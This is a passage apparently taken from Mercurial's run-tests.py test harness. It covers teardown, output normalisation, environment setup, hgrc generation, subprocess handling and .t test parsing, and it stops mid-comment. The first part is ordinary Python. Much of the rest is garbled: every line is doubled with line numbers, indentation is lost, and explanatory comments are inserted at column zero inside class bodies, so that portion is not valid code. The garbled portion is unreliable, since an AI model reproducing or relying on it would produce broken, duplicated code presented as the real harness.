        elif ret is False:
            self.fail('no result code from test')
        elif out != self._refout:
            # Diff generation may rely on written .err file.
            if (
                (ret != 0 or out != self._refout)
                and not self._skipped
                and not self._debug
            ):
                with open(self.errpath, 'wb') as f:
                    for line in out:
                        f.write(line)

            # The result object handles diff calculation for us.
            with firstlock:
                if self._result.addOutputMismatch(self, ret, out, self._refout):
                    # change was accepted, skip failing
                    return
                if self._first:
                    global firsterror
                    firsterror = True

            if ret:
                msg = 'output changed and ' + describe(ret)
            else:
                msg = 'output changed'

            self.fail(msg)
        elif ret:
            self.fail(describe(ret))

    def tearDown(self):
        """Tasks to perform after run()."""
        for entry in self._daemonpids:
            killdaemons(entry)
        self._daemonpids = []

        if self._keeptmpdir:
            log(
                '\nKeeping testtmp dir: %s\nKeeping threadtmp dir: %s'
                % (
                    self._testtmp.decode('utf-8'),
                    self._threadtmp.decode('utf-8'),
                )
            )
        else:
            try:
                shutil.rmtree(self._testtmp)
            except OSError:
                # unreadable directory may be left in $TESTTMP; fix permission
                # and try again
                makecleanable(self._testtmp)
                shutil.rmtree(self._testtmp, True)
            shutil.rmtree(self._threadtmp, True)

        if self._usechg:
            # chgservers will stop automatically after they find the socket
            # files are deleted
            shutil.rmtree(self._chgsockdir, True)

        if (
            (self._ret != 0 or self._out != self._refout)
            and not self._skipped
            and not self._debug
            and self._out
        ):
            with open(self.errpath, 'wb') as f:
                for line in self._out:
                    f.write(line)

        vlog("# Ret was:", self._ret, '(%s)' % self.name)

    def _run(self, env):
        # This should be implemented in child classes to run tests.
        raise unittest.SkipTest('unknown test type')

    def abort(self):
        """Terminate execution of this test."""
        self._aborted = True

    def _portmap(self, i):
        offset = b'' if i == 0 else b'%d' % i
        return (br':%d\b' % (self._startport + i), b':$HGPORT%s' % offset)
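    # For example, with the default start port of 20059, self._portmap(1)
    # returns (br':20060\b', b':$HGPORT1'), so literal port numbers in test
    # output are rewritten to the stable $HGPORT1 placeholder.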

    def _getreplacements(self):
        """Obtain a mapping of text replacements to apply to test output.

        Test output needs to be normalized so it can be compared to expected
        output. This function defines how some of that normalization will
        occur.
        """
        r = [
            # This list should be parallel to defineport in _getenv
            self._portmap(0),
            self._portmap(1),
            self._portmap(2),
            (br'([^0-9])%s' % re.escape(self._localip()), br'\1$LOCALIP'),
            (br'\bHG_TXNID=TXN:[a-f0-9]{40}\b', br'HG_TXNID=TXN:$ID$'),
        ]
        r.append((self._escapepath(self._testtmp), b'$TESTTMP'))

        replacementfile = os.path.join(self._testdir, b'common-pattern.py')

        if os.path.exists(replacementfile):
            data = {}
            with open(replacementfile, mode='rb') as source:
                # the intermediate 'compile' step helps with debugging
                code = compile(source.read(), replacementfile, 'exec')
                exec(code, data)
                for value in data.get('substitutions', ()):
                    if len(value) != 2:
                        msg = 'malformatted substitution in %s: %r'
                        msg %= (replacementfile, value)
                        raise ValueError(msg)
                    r.append(value)
        return r

    def _escapepath(self, p):
        if os.name == 'nt':
            return b''.join(
                c.isalpha()
                and b'[%s%s]' % (c.lower(), c.upper())
                or c in b'/\\'
                and br'[/\\]'
                or c.isdigit()
                and c
                or b'\\' + c
                for c in [p[i : i + 1] for i in range(len(p))]
            )
        else:
            return re.escape(p)
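    # Rough sketch of the Windows branch above: letters become
    # case-insensitive classes such as b'[tT]', '/' and '\' both collapse to
    # the class b'[/\\]', digits pass through unchanged, and every other byte
    # is backslash-escaped before being used as part of a regex.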

    def _localip(self):
        if self._useipv6:
            return b'::1'
        else:
            return b'127.0.0.1'

    def _genrestoreenv(self, testenv):
        """Generate a script that can be used by tests to restore the original
        environment."""
        # Put the restoreenv script inside self._threadtmp
        scriptpath = os.path.join(self._threadtmp, b'restoreenv.sh')
        testenv['HGTEST_RESTOREENV'] = _strpath(scriptpath)

        # Only restore environment variable names that the shell allows
        # us to export.
        name_regex = re.compile('^[a-zA-Z][a-zA-Z0-9_]*$')

        # Do not restore these variables; otherwise tests would fail.
        reqnames = {'PYTHON', 'TESTDIR', 'TESTTMP'}

        with open(scriptpath, 'w') as envf:
            for name, value in origenviron.items():
                if not name_regex.match(name):
                    # Skip environment variables with unusual names not
                    # allowed by most shells.
                    continue
                if name in reqnames:
                    continue
                envf.write('%s=%s\n' % (name, shellquote(value)))

            for name in testenv:
                if name in origenviron or name in reqnames:
                    continue
                envf.write('unset %s\n' % (name,))
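    # A hypothetical restoreenv.sh written above might look like
    #
    #   PATH='/usr/bin:/bin'
    #   ...
    #   unset HGPORT
    #
    # i.e. original variables re-exported with shell quoting, followed by
    # 'unset' lines for names that exist only in the test environment.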

    def _getenv(self):
        """Obtain environment variables to use during test execution."""

        def defineport(i):
            offset = '' if i == 0 else '%s' % i
            env["HGPORT%s" % offset] = '%s' % (self._startport + i)

        env = os.environ.copy()
        env['PYTHONUSERBASE'] = sysconfig.get_config_var('userbase') or ''
        env['HGEMITWARNINGS'] = '1'
        env['TESTTMP'] = _strpath(self._testtmp)
        env['TESTNAME'] = self.name
        env['HOME'] = _strpath(self._testtmp)
        # This number should match portneeded in _getport
        for port in xrange(3):
            # This list should be parallel to _portmap in _getreplacements
            defineport(port)
        env["HGRCPATH"] = _strpath(os.path.join(self._threadtmp, b'.hgrc'))
        env["DAEMON_PIDS"] = _strpath(
            os.path.join(self._threadtmp, b'daemon.pids')
        )
        env["HGEDITOR"] = (
            '"' + sysexecutable + '"' + ' -c "import sys; sys.exit(0)"'
        )
        env["HGUSER"] = "test"
        env["HGENCODING"] = "ascii"
        env["HGENCODINGMODE"] = "strict"
        env["HGHOSTNAME"] = "test-hostname"
        env['HGIPV6'] = str(int(self._useipv6))
        # See contrib/catapipe.py for how to use this functionality.
        if 'HGTESTCATAPULTSERVERPIPE' not in env:
            # If we don't have HGTESTCATAPULTSERVERPIPE explicitly set, pull the
            # non-test one in as a default, otherwise set to devnull
            env['HGTESTCATAPULTSERVERPIPE'] = env.get(
                'HGCATAPULTSERVERPIPE', os.devnull
            )

        extraextensions = []
        for opt in self._extraconfigopts:
1347 section, key = opt.encode('utf-8').split(b'.', 1)
1347 section, key = opt.encode('utf-8').split(b'.', 1)
1348 if section != b'extensions':  # section is bytes (split on b'.')
1348 if section != b'extensions':  # section is bytes (split on b'.')
1349 continue
1349 continue
1350 name = key.split(b'=', 1)[0]
1350 name = key.split(b'=', 1)[0]
1351 extraextensions.append(name)
1351 extraextensions.append(name)
1352
1352
1353 if extraextensions:
1353 if extraextensions:
1354 env['HGTESTEXTRAEXTENSIONS'] = b' '.join(extraextensions)
1354 env['HGTESTEXTRAEXTENSIONS'] = b' '.join(extraextensions)
1355
1355
1356 # LOCALIP could be ::1 or 127.0.0.1. Useful for tests that require raw
1356 # LOCALIP could be ::1 or 127.0.0.1. Useful for tests that require raw
1357 # IP addresses.
1357 # IP addresses.
1358 env['LOCALIP'] = _strpath(self._localip())
1358 env['LOCALIP'] = _strpath(self._localip())
1359
1359
1360 # This has the same effect as Py_LegacyWindowsStdioFlag in exewrapper.c,
1360 # This has the same effect as Py_LegacyWindowsStdioFlag in exewrapper.c,
1361 # but this is needed for testing python instances like dummyssh,
1361 # but this is needed for testing python instances like dummyssh,
1362 # dummysmtpd.py, and dumbhttp.py.
1362 # dummysmtpd.py, and dumbhttp.py.
1363 if PYTHON3 and os.name == 'nt':
1363 if PYTHON3 and os.name == 'nt':
1364 env['PYTHONLEGACYWINDOWSSTDIO'] = '1'
1364 env['PYTHONLEGACYWINDOWSSTDIO'] = '1'
1365
1365
1366 # Modified HOME in test environment can confuse Rust tools. So set
1366 # Modified HOME in test environment can confuse Rust tools. So set
1367 # CARGO_HOME and RUSTUP_HOME automatically if a Rust toolchain is
1367 # CARGO_HOME and RUSTUP_HOME automatically if a Rust toolchain is
1368 # present and these variables aren't already defined.
1368 # present and these variables aren't already defined.
1369 cargo_home_path = os.path.expanduser('~/.cargo')
1369 cargo_home_path = os.path.expanduser('~/.cargo')
1370 rustup_home_path = os.path.expanduser('~/.rustup')
1370 rustup_home_path = os.path.expanduser('~/.rustup')
1371
1371
1372 if os.path.exists(cargo_home_path) and b'CARGO_HOME' not in osenvironb:
1372 if os.path.exists(cargo_home_path) and b'CARGO_HOME' not in osenvironb:
1373 env['CARGO_HOME'] = cargo_home_path
1373 env['CARGO_HOME'] = cargo_home_path
1374 if (
1374 if (
1375 os.path.exists(rustup_home_path)
1375 os.path.exists(rustup_home_path)
1376 and b'RUSTUP_HOME' not in osenvironb
1376 and b'RUSTUP_HOME' not in osenvironb
1377 ):
1377 ):
1378 env['RUSTUP_HOME'] = rustup_home_path
1378 env['RUSTUP_HOME'] = rustup_home_path
1379
1379
1380 # Reset some environment variables to well-known values so that
1380 # Reset some environment variables to well-known values so that
1381 # the tests produce repeatable output.
1381 # the tests produce repeatable output.
1382 env['LANG'] = env['LC_ALL'] = env['LANGUAGE'] = 'C'
1382 env['LANG'] = env['LC_ALL'] = env['LANGUAGE'] = 'C'
1383 env['TZ'] = 'GMT'
1383 env['TZ'] = 'GMT'
1384 env["EMAIL"] = "Foo Bar <foo.bar@example.com>"
1384 env["EMAIL"] = "Foo Bar <foo.bar@example.com>"
1385 env['COLUMNS'] = '80'
1385 env['COLUMNS'] = '80'
1386 env['TERM'] = 'xterm'
1386 env['TERM'] = 'xterm'
1387
1387
1388 dropped = [
1388 dropped = [
1389 'CDPATH',
1389 'CDPATH',
1390 'CHGDEBUG',
1390 'CHGDEBUG',
1391 'EDITOR',
1391 'EDITOR',
1392 'GREP_OPTIONS',
1392 'GREP_OPTIONS',
1393 'HG',
1393 'HG',
1394 'HGMERGE',
1394 'HGMERGE',
1395 'HGPLAIN',
1395 'HGPLAIN',
1396 'HGPLAINEXCEPT',
1396 'HGPLAINEXCEPT',
1397 'HGPROF',
1397 'HGPROF',
1398 'http_proxy',
1398 'http_proxy',
1399 'no_proxy',
1399 'no_proxy',
1400 'NO_PROXY',
1400 'NO_PROXY',
1401 'PAGER',
1401 'PAGER',
1402 'VISUAL',
1402 'VISUAL',
1403 ]
1403 ]
1404
1404
1405 for k in dropped:
1405 for k in dropped:
1406 if k in env:
1406 if k in env:
1407 del env[k]
1407 del env[k]
1408
1408
1409 # unset env related to hooks
1409 # unset env related to hooks
1410 for k in list(env):
1410 for k in list(env):
1411 if k.startswith('HG_'):
1411 if k.startswith('HG_'):
1412 del env[k]
1412 del env[k]
1413
1413
1414 if self._usechg:
1414 if self._usechg:
1415 env['CHGSOCKNAME'] = os.path.join(self._chgsockdir, b'server')
1415 env['CHGSOCKNAME'] = os.path.join(self._chgsockdir, b'server')
1416
1416
1417 return env
1417 return env
1418
1418
1419 def _createhgrc(self, path):
1419 def _createhgrc(self, path):
1420 """Create an hgrc file for this test."""
1420 """Create an hgrc file for this test."""
1421 with open(path, 'wb') as hgrc:
1421 with open(path, 'wb') as hgrc:
1422 hgrc.write(b'[ui]\n')
1422 hgrc.write(b'[ui]\n')
1423 hgrc.write(b'slash = True\n')
1423 hgrc.write(b'slash = True\n')
1424 hgrc.write(b'interactive = False\n')
1424 hgrc.write(b'interactive = False\n')
1425 hgrc.write(b'merge = internal:merge\n')
1425 hgrc.write(b'merge = internal:merge\n')
1426 hgrc.write(b'mergemarkers = detailed\n')
1426 hgrc.write(b'mergemarkers = detailed\n')
1427 hgrc.write(b'promptecho = True\n')
1427 hgrc.write(b'promptecho = True\n')
1428 hgrc.write(b'[defaults]\n')
1428 hgrc.write(b'[defaults]\n')
1429 hgrc.write(b'[devel]\n')
1429 hgrc.write(b'[devel]\n')
1430 hgrc.write(b'all-warnings = true\n')
1430 hgrc.write(b'all-warnings = true\n')
1431 hgrc.write(b'default-date = 0 0\n')
1431 hgrc.write(b'default-date = 0 0\n')
1432 hgrc.write(b'[largefiles]\n')
1432 hgrc.write(b'[largefiles]\n')
1433 hgrc.write(
1433 hgrc.write(
1434 b'usercache = %s\n'
1434 b'usercache = %s\n'
1435 % (os.path.join(self._testtmp, b'.cache/largefiles'))
1435 % (os.path.join(self._testtmp, b'.cache/largefiles'))
1436 )
1436 )
1437 hgrc.write(b'[lfs]\n')
1437 hgrc.write(b'[lfs]\n')
1438 hgrc.write(
1438 hgrc.write(
1439 b'usercache = %s\n'
1439 b'usercache = %s\n'
1440 % (os.path.join(self._testtmp, b'.cache/lfs'))
1440 % (os.path.join(self._testtmp, b'.cache/lfs'))
1441 )
1441 )
1442 hgrc.write(b'[web]\n')
1442 hgrc.write(b'[web]\n')
1443 hgrc.write(b'address = localhost\n')
1443 hgrc.write(b'address = localhost\n')
1444 hgrc.write(b'ipv6 = %s\n' % str(self._useipv6).encode('ascii'))
1444 hgrc.write(b'ipv6 = %s\n' % str(self._useipv6).encode('ascii'))
1445 hgrc.write(b'server-header = testing stub value\n')
1445 hgrc.write(b'server-header = testing stub value\n')
1446
1446
1447 for opt in self._extraconfigopts:
1447 for opt in self._extraconfigopts:
1448 section, key = opt.encode('utf-8').split(b'.', 1)
1448 section, key = opt.encode('utf-8').split(b'.', 1)
1449 assert b'=' in key, (
1449 assert b'=' in key, (
1450 'extra config opt %s must have an = for assignment' % opt
1450 'extra config opt %s must have an = for assignment' % opt
1451 )
1451 )
1452 hgrc.write(b'[%s]\n%s\n' % (section, key))
1452 hgrc.write(b'[%s]\n%s\n' % (section, key))
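
# Illustration (not in the original file): an extra config option such as
# ui.foo=bar arriving via self._extraconfigopts ends up appended to the
# generated hgrc as
#   [ui]
#   foo=bar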
1453
1453
1454 def fail(self, msg):
1454 def fail(self, msg):
1455 # unittest differentiates between errored and failed.
1455 # unittest differentiates between errored and failed.
1456 # Failed is denoted by AssertionError (by default at least).
1456 # Failed is denoted by AssertionError (by default at least).
1457 raise AssertionError(msg)
1457 raise AssertionError(msg)
1458
1458
1459 def _runcommand(self, cmd, env, normalizenewlines=False):
1459 def _runcommand(self, cmd, env, normalizenewlines=False):
1460 """Run command in a sub-process, capturing the output (stdout and
1460 """Run command in a sub-process, capturing the output (stdout and
1461 stderr).
1461 stderr).
1462
1462
1463 Return a tuple (exitcode, output). output is None in debug mode.
1463 Return a tuple (exitcode, output). output is None in debug mode.
1464 """
1464 """
1465 if self._debug:
1465 if self._debug:
1466 proc = subprocess.Popen(
1466 proc = subprocess.Popen(
1467 _strpath(cmd), shell=True, cwd=_strpath(self._testtmp), env=env
1467 _strpath(cmd), shell=True, cwd=_strpath(self._testtmp), env=env
1468 )
1468 )
1469 ret = proc.wait()
1469 ret = proc.wait()
1470 return (ret, None)
1470 return (ret, None)
1471
1471
1472 proc = Popen4(cmd, self._testtmp, self._timeout, env)
1472 proc = Popen4(cmd, self._testtmp, self._timeout, env)
1473
1473
1474 def cleanup():
1474 def cleanup():
1475 terminate(proc)
1475 terminate(proc)
1476 ret = proc.wait()
1476 ret = proc.wait()
1477 if ret == 0:
1477 if ret == 0:
1478 ret = signal.SIGTERM << 8
1478 ret = signal.SIGTERM << 8
1479 killdaemons(env['DAEMON_PIDS'])
1479 killdaemons(env['DAEMON_PIDS'])
1480 return ret
1480 return ret
1481
1481
1482 proc.tochild.close()
1482 proc.tochild.close()
1483
1483
1484 try:
1484 try:
1485 output = proc.fromchild.read()
1485 output = proc.fromchild.read()
1486 except KeyboardInterrupt:
1486 except KeyboardInterrupt:
1487 vlog('# Handling keyboard interrupt')
1487 vlog('# Handling keyboard interrupt')
1488 cleanup()
1488 cleanup()
1489 raise
1489 raise
1490
1490
1491 ret = proc.wait()
1491 ret = proc.wait()
1492 if wifexited(ret):
1492 if wifexited(ret):
1493 ret = os.WEXITSTATUS(ret)
1493 ret = os.WEXITSTATUS(ret)
1494
1494
1495 if proc.timeout:
1495 if proc.timeout:
1496 ret = 'timeout'
1496 ret = 'timeout'
1497
1497
1498 if ret:
1498 if ret:
1499 killdaemons(env['DAEMON_PIDS'])
1499 killdaemons(env['DAEMON_PIDS'])
1500
1500
1501 for s, r in self._getreplacements():
1501 for s, r in self._getreplacements():
1502 output = re.sub(s, r, output)
1502 output = re.sub(s, r, output)
1503
1503
1504 if normalizenewlines:
1504 if normalizenewlines:
1505 output = output.replace(b'\r\n', b'\n')
1505 output = output.replace(b'\r\n', b'\n')
1506
1506
1507 return ret, output.splitlines(True)
1507 return ret, output.splitlines(True)
1508
1508
1509
1509
1510 class PythonTest(Test):
1510 class PythonTest(Test):
1511 """A Python-based test."""
1511 """A Python-based test."""
1512
1512
1513 @property
1513 @property
1514 def refpath(self):
1514 def refpath(self):
1515 return os.path.join(self._testdir, b'%s.out' % self.bname)
1515 return os.path.join(self._testdir, b'%s.out' % self.bname)
1516
1516
1517 def _run(self, env):
1517 def _run(self, env):
1518 py3switch = b' -3' if self._py3warnings else b''
1518 py3switch = b' -3' if self._py3warnings else b''
1519 # Quote the python(3) executable for Windows
1519 # Quote the python(3) executable for Windows
1520 cmd = b'"%s"%s "%s"' % (PYTHON, py3switch, self.path)
1520 cmd = b'"%s"%s "%s"' % (PYTHON, py3switch, self.path)
1521 vlog("# Running", cmd.decode("utf-8"))
1521 vlog("# Running", cmd.decode("utf-8"))
1522 normalizenewlines = os.name == 'nt'
1522 normalizenewlines = os.name == 'nt'
1523 result = self._runcommand(cmd, env, normalizenewlines=normalizenewlines)
1523 result = self._runcommand(cmd, env, normalizenewlines=normalizenewlines)
1524 if self._aborted:
1524 if self._aborted:
1525 raise KeyboardInterrupt()
1525 raise KeyboardInterrupt()
1526
1526
1527 return result
1527 return result
1528
1528
1529
1529
1530 # Some glob patterns apply only in some circumstances, so the script
1530 # Some glob patterns apply only in some circumstances, so the script
1531 # might want to remove (glob) annotations that otherwise should be
1531 # might want to remove (glob) annotations that otherwise should be
1532 # retained.
1532 # retained.
1533 checkcodeglobpats = [
1533 checkcodeglobpats = [
1534 # On Windows it looks like \ doesn't require a (glob), but we know
1534 # On Windows it looks like \ doesn't require a (glob), but we know
1535 # better.
1535 # better.
1536 re.compile(br'^pushing to \$TESTTMP/.*[^)]$'),
1536 re.compile(br'^pushing to \$TESTTMP/.*[^)]$'),
1537 re.compile(br'^moving \S+/.*[^)]$'),
1537 re.compile(br'^moving \S+/.*[^)]$'),
1538 re.compile(br'^pulling from \$TESTTMP/.*[^)]$'),
1538 re.compile(br'^pulling from \$TESTTMP/.*[^)]$'),
1539 # Not all platforms have 127.0.0.1 as loopback (though most do),
1539 # Not all platforms have 127.0.0.1 as loopback (though most do),
1540 # so we always glob that too.
1540 # so we always glob that too.
1541 re.compile(br'.*\$LOCALIP.*$'),
1541 re.compile(br'.*\$LOCALIP.*$'),
1542 ]
1542 ]
1543
1543
1544 bchr = chr
1544 bchr = chr
1545 if PYTHON3:
1545 if PYTHON3:
1546 bchr = lambda x: bytes([x])
1546 bchr = lambda x: bytes([x])
1547
1547
1548 WARN_UNDEFINED = 1
1548 WARN_UNDEFINED = 1
1549 WARN_YES = 2
1549 WARN_YES = 2
1550 WARN_NO = 3
1550 WARN_NO = 3
1551
1551
1552 MARK_OPTIONAL = b" (?)\n"
1552 MARK_OPTIONAL = b" (?)\n"
1553
1553
1554
1554
1555 def isoptional(line):
1555 def isoptional(line):
1556 return line.endswith(MARK_OPTIONAL)
1556 return line.endswith(MARK_OPTIONAL)
1557
1557
1558
1558
1559 class TTest(Test):
1559 class TTest(Test):
1560 """A "t test" is a test backed by a .t file."""
1560 """A "t test" is a test backed by a .t file."""
1561
1561
1562 SKIPPED_PREFIX = b'skipped: '
1562 SKIPPED_PREFIX = b'skipped: '
1563 FAILED_PREFIX = b'hghave check failed: '
1563 FAILED_PREFIX = b'hghave check failed: '
1564 NEEDESCAPE = re.compile(br'[\x00-\x08\x0b-\x1f\x7f-\xff]').search
1564 NEEDESCAPE = re.compile(br'[\x00-\x08\x0b-\x1f\x7f-\xff]').search
1565
1565
1566 ESCAPESUB = re.compile(br'[\x00-\x08\x0b-\x1f\\\x7f-\xff]').sub
1566 ESCAPESUB = re.compile(br'[\x00-\x08\x0b-\x1f\\\x7f-\xff]').sub
1567 ESCAPEMAP = dict((bchr(i), br'\x%02x' % i) for i in range(256))
1567 ESCAPEMAP = dict((bchr(i), br'\x%02x' % i) for i in range(256))
1568 ESCAPEMAP.update({b'\\': b'\\\\', b'\r': br'\r'})
1568 ESCAPEMAP.update({b'\\': b'\\\\', b'\r': br'\r'})
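
# Illustration (not in the original file): bytes flagged by NEEDESCAPE, such
# as b'foo\x1bbar', come out of TTest._stringescape() as b'foo\\x1bbar',
# which is the form recorded on " (esc)" output lines.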
1569
1569
1570 def __init__(self, path, *args, **kwds):
1570 def __init__(self, path, *args, **kwds):
1571 # accept an extra "case" parameter
1571 # accept an extra "case" parameter
1572 case = kwds.pop('case', [])
1572 case = kwds.pop('case', [])
1573 self._case = case
1573 self._case = case
1574 self._allcases = {x for y in parsettestcases(path) for x in y}
1574 self._allcases = {x for y in parsettestcases(path) for x in y}
1575 super(TTest, self).__init__(path, *args, **kwds)
1575 super(TTest, self).__init__(path, *args, **kwds)
1576 if case:
1576 if case:
1577 casepath = b'#'.join(case)
1577 casepath = b'#'.join(case)
1578 self.name = '%s#%s' % (self.name, _strpath(casepath))
1578 self.name = '%s#%s' % (self.name, _strpath(casepath))
1579 self.errpath = b'%s#%s.err' % (self.errpath[:-4], casepath)
1579 self.errpath = b'%s#%s.err' % (self.errpath[:-4], casepath)
1580 self._tmpname += b'-%s' % casepath
1580 self._tmpname += b'-%s' % casepath
1581 self._have = {}
1581 self._have = {}
1582
1582
1583 @property
1583 @property
1584 def refpath(self):
1584 def refpath(self):
1585 return os.path.join(self._testdir, self.bname)
1585 return os.path.join(self._testdir, self.bname)
1586
1586
1587 def _run(self, env):
1587 def _run(self, env):
1588 with open(self.path, 'rb') as f:
1588 with open(self.path, 'rb') as f:
1589 lines = f.readlines()
1589 lines = f.readlines()
1590
1590
1591 # .t file is both reference output and the test input, keep reference
1591 # .t file is both reference output and the test input, keep reference
1592 # output updated with the test input. This avoids some race
1592 # output updated with the test input. This avoids some race
1593 # conditions where the reference output does not match the actual test.
1593 # conditions where the reference output does not match the actual test.
1594 if self._refout is not None:
1594 if self._refout is not None:
1595 self._refout = lines
1595 self._refout = lines
1596
1596
1597 salt, script, after, expected = self._parsetest(lines)
1597 salt, script, after, expected = self._parsetest(lines)
1598
1598
1599 # Write out the generated script.
1599 # Write out the generated script.
1600 fname = b'%s.sh' % self._testtmp
1600 fname = b'%s.sh' % self._testtmp
1601 with open(fname, 'wb') as f:
1601 with open(fname, 'wb') as f:
1602 for l in script:
1602 for l in script:
1603 f.write(l)
1603 f.write(l)
1604
1604
1605 cmd = b'%s "%s"' % (self._shell, fname)
1605 cmd = b'%s "%s"' % (self._shell, fname)
1606 vlog("# Running", cmd.decode("utf-8"))
1606 vlog("# Running", cmd.decode("utf-8"))
1607
1607
1608 exitcode, output = self._runcommand(cmd, env)
1608 exitcode, output = self._runcommand(cmd, env)
1609
1609
1610 if self._aborted:
1610 if self._aborted:
1611 raise KeyboardInterrupt()
1611 raise KeyboardInterrupt()
1612
1612
1613 # Do not merge output if skipped. Return hghave message instead.
1613 # Do not merge output if skipped. Return hghave message instead.
1614 # Similarly, with --debug, output is None.
1614 # Similarly, with --debug, output is None.
1615 if exitcode == self.SKIPPED_STATUS or output is None:
1615 if exitcode == self.SKIPPED_STATUS or output is None:
1616 return exitcode, output
1616 return exitcode, output
1617
1617
1618 return self._processoutput(exitcode, output, salt, after, expected)
1618 return self._processoutput(exitcode, output, salt, after, expected)
1619
1619
1620 def _hghave(self, reqs):
1620 def _hghave(self, reqs):
1621 allreqs = b' '.join(reqs)
1621 allreqs = b' '.join(reqs)
1622
1622
1623 self._detectslow(reqs)
1623 self._detectslow(reqs)
1624
1624
1625 if allreqs in self._have:
1625 if allreqs in self._have:
1626 return self._have.get(allreqs)
1626 return self._have.get(allreqs)
1627
1627
1628 # TODO do something smarter when all other uses of hghave are gone.
1628 # TODO do something smarter when all other uses of hghave are gone.
1629 runtestdir = os.path.abspath(os.path.dirname(_bytespath(__file__)))
1629 runtestdir = os.path.abspath(os.path.dirname(_bytespath(__file__)))
1630 tdir = runtestdir.replace(b'\\', b'/')
1630 tdir = runtestdir.replace(b'\\', b'/')
1631 proc = Popen4(
1631 proc = Popen4(
1632 b'%s -c "%s/hghave %s"' % (self._shell, tdir, allreqs),
1632 b'%s -c "%s/hghave %s"' % (self._shell, tdir, allreqs),
1633 self._testtmp,
1633 self._testtmp,
1634 0,
1634 0,
1635 self._getenv(),
1635 self._getenv(),
1636 )
1636 )
1637 stdout, stderr = proc.communicate()
1637 stdout, stderr = proc.communicate()
1638 ret = proc.wait()
1638 ret = proc.wait()
1639 if wifexited(ret):
1639 if wifexited(ret):
1640 ret = os.WEXITSTATUS(ret)
1640 ret = os.WEXITSTATUS(ret)
1641 if ret == 2:
1641 if ret == 2:
1642 print(stdout.decode('utf-8'))
1642 print(stdout.decode('utf-8'))
1643 sys.exit(1)
1643 sys.exit(1)
1644
1644
1645 if ret != 0:
1645 if ret != 0:
1646 self._have[allreqs] = (False, stdout)
1646 self._have[allreqs] = (False, stdout)
1647 return False, stdout
1647 return False, stdout
1648
1648
1649 self._have[allreqs] = (True, None)
1649 self._have[allreqs] = (True, None)
1650 return True, None
1650 return True, None
1651
1651
1652 def _detectslow(self, reqs):
1652 def _detectslow(self, reqs):
1653 """update the timeout of slow test when appropriate"""
1653 """update the timeout of slow test when appropriate"""
1654 if b'slow' in reqs:
1654 if b'slow' in reqs:
1655 self._timeout = self._slowtimeout
1655 self._timeout = self._slowtimeout
1656
1656
1657 def _iftest(self, args):
1657 def _iftest(self, args):
1658 # implements "#if"
1658 # implements "#if"
1659 reqs = []
1659 reqs = []
1660 for arg in args:
1660 for arg in args:
1661 if arg.startswith(b'no-') and arg[3:] in self._allcases:
1661 if arg.startswith(b'no-') and arg[3:] in self._allcases:
1662 if arg[3:] in self._case:
1662 if arg[3:] in self._case:
1663 return False
1663 return False
1664 elif arg in self._allcases:
1664 elif arg in self._allcases:
1665 if arg not in self._case:
1665 if arg not in self._case:
1666 return False
1666 return False
1667 else:
1667 else:
1668 reqs.append(arg)
1668 reqs.append(arg)
1669 self._detectslow(reqs)
1669 self._detectslow(reqs)
1670 return self._hghave(reqs)[0]
1670 return self._hghave(reqs)[0]
1671
1671
1672 def _parsetest(self, lines):
1672 def _parsetest(self, lines):
1673 # We generate a shell script which outputs unique markers to line
1673 # We generate a shell script which outputs unique markers to line
1674 # up script results with our source. These markers include input
1674 # up script results with our source. These markers include input
1675 # line number and the last return code.
1675 # line number and the last return code.
1676 salt = b"SALT%d" % time.time()
1676 salt = b"SALT%d" % time.time()
1677
1677
1678 def addsalt(line, inpython):
1678 def addsalt(line, inpython):
1679 if inpython:
1679 if inpython:
1680 script.append(b'%s %d 0\n' % (salt, line))
1680 script.append(b'%s %d 0\n' % (salt, line))
1681 else:
1681 else:
1682 script.append(b'echo %s %d $?\n' % (salt, line))
1682 script.append(b'echo %s %d $?\n' % (salt, line))
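
# Illustration (not in the original file): each "  $ ..." command gets a
# marker line such as
#   echo SALT1579900000 42 $?
# emitted into the generated script, where 42 is the .t source line number
# and $? is the preceding command's exit status; _processoutput() later
# splits the captured output on the salt to line everything back up with
# the source.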
1683
1683
1684 activetrace = []
1684 activetrace = []
1685 session = str(uuid.uuid4())
1685 session = str(uuid.uuid4())
1686 if PYTHON3:
1686 if PYTHON3:
1687 session = session.encode('ascii')
1687 session = session.encode('ascii')
1688 hgcatapult = os.getenv('HGTESTCATAPULTSERVERPIPE') or os.getenv(
1688 hgcatapult = os.getenv('HGTESTCATAPULTSERVERPIPE') or os.getenv(
1689 'HGCATAPULTSERVERPIPE'
1689 'HGCATAPULTSERVERPIPE'
1690 )
1690 )
1691
1691
1692 def toggletrace(cmd=None):
1692 def toggletrace(cmd=None):
1693 if not hgcatapult or hgcatapult == os.devnull:
1693 if not hgcatapult or hgcatapult == os.devnull:
1694 return
1694 return
1695
1695
1696 if activetrace:
1696 if activetrace:
1697 script.append(
1697 script.append(
1698 b'echo END %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1698 b'echo END %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1699 % (session, activetrace[0])
1699 % (session, activetrace[0])
1700 )
1700 )
1701 if cmd is None:
1701 if cmd is None:
1702 return
1702 return
1703
1703
1704 if isinstance(cmd, str):
1704 if isinstance(cmd, str):
1705 quoted = shellquote(cmd.strip())
1705 quoted = shellquote(cmd.strip())
1706 else:
1706 else:
1707 quoted = shellquote(cmd.strip().decode('utf8')).encode('utf8')
1707 quoted = shellquote(cmd.strip().decode('utf8')).encode('utf8')
1708 quoted = quoted.replace(b'\\', b'\\\\')
1708 quoted = quoted.replace(b'\\', b'\\\\')
1709 script.append(
1709 script.append(
1710 b'echo START %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1710 b'echo START %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1711 % (session, quoted)
1711 % (session, quoted)
1712 )
1712 )
1713 activetrace[0:] = [quoted]
1713 activetrace[0:] = [quoted]
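
# Illustration (not in the original file): with catapult tracing active,
# toggletrace() emits a line like
#   echo START <session-uuid> 'hg status' >> "$HGTESTCATAPULTSERVERPIPE"
# before a traced command, and the matching END line when the next command
# starts or tracing is shut down.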
1714
1714
1715 script = []
1715 script = []
1716
1716
1717 # After we run the shell script, we re-unify the script output
1717 # After we run the shell script, we re-unify the script output
1718 # with non-active parts of the source, with synchronization by our
1718 # with non-active parts of the source, with synchronization by our
1719 # SALT line number markers. The after table contains the non-active
1719 # SALT line number markers. The after table contains the non-active
1720 # components, ordered by line number.
1720 # components, ordered by line number.
1721 after = {}
1721 after = {}
1722
1722
1723 # Expected shell script output.
1723 # Expected shell script output.
1724 expected = {}
1724 expected = {}
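
# Illustration (not in the original file): for a tiny .t body
#   $ echo hi
#   hi
# the parse loop below produces roughly
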